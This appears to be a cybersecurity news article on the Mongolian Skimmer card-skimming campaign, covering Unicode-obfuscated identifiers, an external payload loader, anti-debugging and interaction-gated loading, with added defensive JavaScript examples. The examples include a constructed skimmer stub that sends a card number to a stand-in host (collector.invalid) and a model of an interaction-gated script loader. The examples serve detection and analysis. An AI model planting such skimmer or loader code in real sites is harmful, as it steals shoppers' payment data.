Mongolian Skimmer Hidden by Cybercriminals Using Unicode in E-Commerce.

SeniorTechInfo
Mongolian Skimmer: A New Digital Skimmer Campaign


Oct 10, 2024 | Ravie Lakshmanan | Cybercrime / Malware

Cybersecurity researchers have uncovered a new digital skimmer campaign, dubbed Mongolian Skimmer, that uses Unicode obfuscation to hide its malicious code.

Jscrambler researchers noted that the script's identifiers are built from unusual Unicode characters, which makes the code very hard for a human to read at a glance. The obfuscation hides the skimmer's purpose from casual inspection, but it does not survive mechanical analysis: the characters are only identifiers, so renaming them is enough to recover readable code.

The technique relies on JavaScript accepting a wide range of Unicode letters in identifiers, so variable and function names can be composed of characters that carry no meaning for a reader. Behind that disguise the skimmer captures sensitive data, including payment card details, entered on e-commerce checkout or admin pages and sends it to an attacker-controlled server.
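The following is an added example, not code from the Jscrambler analysis or from the skimmer itself. It shows three things at once: that the JavaScript engine happily accepts Mongolian letters as identifiers, a triage heuristic that flags a script whose identifiers are mostly non-ASCII, and a renaming pass that undoes the disguise. The SAMPLE script, the collector host name and the 0.3 threshold are all constructed for the example.

```javascript
// Added example: Unicode-identifier obfuscation, a detector for it, and a
// rename pass that reverses it. SAMPLE is a constructed stand-in for a
// skimmer stub; the host name is fake.
const SAMPLE = `var ᠥ = window;
var ᠥᠥ = ᠥ.document;
function ᠥᠥᠥ(ᠥᠥᠥᠥ) { return ᠥᠥᠥᠥ.value; }
var ᠣ = ᠥᠥ.querySelector('input[name="cc_number"]');
new Image().src = 'https://collector.invalid/c?d=' + encodeURIComponent(ᠥᠥᠥ(ᠣ));`;

// ECMAScript identifier: ID_Start then ID_Continue*, plus $, _ and ZWNJ/ZWJ.
const IDENT_RE = /[$_\p{ID_Start}][$_\u200c\u200d\p{ID_Continue}]*/gu;
const KEYWORDS = new Set(["var", "let", "const", "function", "return", "new",
  "if", "else", "for", "while", "typeof", "this", "true", "false", "null"]);
const NON_ASCII = /[^\x00-\x7f]/;

// (1) The engine itself has no problem with Mongolian-letter identifiers.
function engineAcceptsMongolianIdentifiers() {
  return new Function("var ᠥ = 2; var ᠥᠥ = ᠥ * 21; return ᠥᠥ;")(); // 42
}

// Split source into code and string-literal segments so text inside quotes is
// not mistaken for identifiers. Comments and regex literals are not handled;
// this is a triage heuristic, not a full tokenizer.
function splitStrings(src) {
  const parts = [];
  let start = 0, i = 0;
  while (i < src.length) {
    const q = src[i];
    if (q === '"' || q === "'" || q === "`") {
      if (i > start) parts.push({ text: src.slice(start, i), isString: false });
      let j = i + 1;
      while (j < src.length && src[j] !== q) { if (src[j] === "\\") j++; j++; }
      j = Math.min(j + 1, src.length);
      parts.push({ text: src.slice(i, j), isString: true });
      start = i = j;
    } else {
      i++;
    }
  }
  if (start < src.length) parts.push({ text: src.slice(start), isString: false });
  return parts;
}

function identifiers(src) {
  const ids = [];
  for (const part of splitStrings(src)) {
    if (part.isString) continue;
    for (const m of part.text.matchAll(IDENT_RE)) {
      if (!KEYWORDS.has(m[0])) ids.push(m[0]);
    }
  }
  return ids;
}

// (2) Triage: share of non-ASCII identifiers, and how many use Mongolian script.
// The 0.3 threshold is an assumption for this example, not a published rule.
function analyze(src) {
  const ids = identifiers(src);
  const nonAscii = ids.filter((id) => NON_ASCII.test(id));
  const mongolian = nonAscii.filter((id) => /\p{Script=Mongolian}/u.test(id));
  const ratio = ids.length ? nonAscii.length / ids.length : 0;
  return { total: ids.length, nonAscii: nonAscii.length, mongolian: mongolian.length,
           ratio, suspicious: ratio > 0.3 };
}

// (3) Undo the disguise: map each distinct non-ASCII identifier to id0, id1, ...
// in order of first appearance. String literals are left untouched.
function renameNonAscii(src) {
  const map = new Map();
  return splitStrings(src).map((part) => part.isString ? part.text :
    part.text.replace(IDENT_RE, (id) => {
      if (!NON_ASCII.test(id)) return id;
      if (!map.has(id)) map.set(id, `id${map.size}`);
      return map.get(id);
    })).join("");
}

console.log(analyze(SAMPLE));
console.log(renameNonAscii(SAMPLE));
```

Run it with `node` to see the triage verdict and the renamed script: the renamed output reads like ordinary card-harvesting code, which is the practical lesson. The heuristic would also flag legitimate scripts written with non-Latin identifiers, so treat a high ratio as a reason to look, not as proof.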

The skimmer is typically injected as an inline script on a compromised site; that inline stub loads the actual payload from an external server, which keeps the bulk of the malicious code off the compromised page and out of a static review of its HTML. It also includes anti-debugging checks that disable parts of its functionality when it detects that the browser's developer tools are being used to inspect it.

Jscrambler’s Pedro Fortuna highlighted that the skimmer uses a variety of event-handling techniques to ensure compatibility across different browsers, making it a potent threat to a wide range of users.

The researchers also identified a loader variant that fetches the skimmer script only after a user-interaction event such as scrolling or a mouse movement. Gating on interaction serves two purposes: automated scanners and crawlers that never interact with the page never trigger the load, and the skimmer does not delay the page's initial load for real visitors.
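As an added example (not the real loader and not Jscrambler's code), the block below models the interaction-gated loader described above together with the external payload fetch, and shows why a scanner that never simulates user input sees nothing. A tiny mock DOM built on Node's own EventTarget/Event (Node 15+) stands in for the browser, and the payload URL is made up.

```javascript
// Added example: an interaction-gated loader stand-in plus a mock DOM, to show
// that a scan without synthetic interaction never observes the payload load.

class MockDocument extends EventTarget {
  constructor() {
    super();
    this.appended = []; // elements a script inserted into the page
    this.head = { appendChild: (el) => { this.appended.push(el); return el; } };
  }
  createElement(tagName) { return { tagName: tagName.toUpperCase() }; }
}

// Constructed loader mirroring the described behaviour: nothing is fetched
// until the visitor scrolls or moves the mouse; the first such event injects a
// <script> pointing at the external payload and removes the listeners so the
// payload is loaded only once.
const TRIGGER_EVENTS = ["scroll", "mousemove"];
function installGatedLoader(doc, payloadUrl) {
  const fire = () => {
    for (const ev of TRIGGER_EVENTS) doc.removeEventListener(ev, fire);
    const s = doc.createElement("script");
    s.src = payloadUrl;
    doc.head.appendChild(s);
  };
  for (const ev of TRIGGER_EVENTS) doc.addEventListener(ev, fire);
}

// Scanner: run the page's script against the mock DOM, optionally replay
// synthetic interaction, and report every external script URL that got injected.
function scanForInjectedScripts(installer, { simulateInteraction = false } = {}) {
  const doc = new MockDocument();
  installer(doc);
  if (simulateInteraction) {
    doc.dispatchEvent(new Event("mousemove"));
    doc.dispatchEvent(new Event("scroll")); // a second event must not inject twice
  }
  return doc.appended.filter((el) => el.tagName === "SCRIPT").map((el) => el.src);
}

const PAYLOAD_URL = "https://cdn.invalid/stage2.js"; // constructed, not a real indicator
const install = (doc) => installGatedLoader(doc, PAYLOAD_URL);

console.log("no interaction  :", scanForInjectedScripts(install));
console.log("with interaction:", scanForInjectedScripts(install, { simulateInteraction: true }));
```

The first scan returns an empty list, the second returns the payload URL once. The design point for a real crawler (headless browser, not this mock) is the same: dispatch scroll and pointer events, then wait for network activity, before concluding a checkout page is clean.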

Some of the compromised Magento sites serving Mongolian Skimmer had also been hit by a second skimmer operator, and rather than compete for the same victims, the two appear to have cooperated to maximize their take.

The two actors communicated with each other through comments left in the injected source code, which pointed to a profit-sharing arrangement between them.

How the skimmer is initially planted has not been established, but the researchers suspect that misconfigured or unpatched Magento and OpenCart installations are being targeted. Awareness and vigilance are crucial to combat such evolving threats.
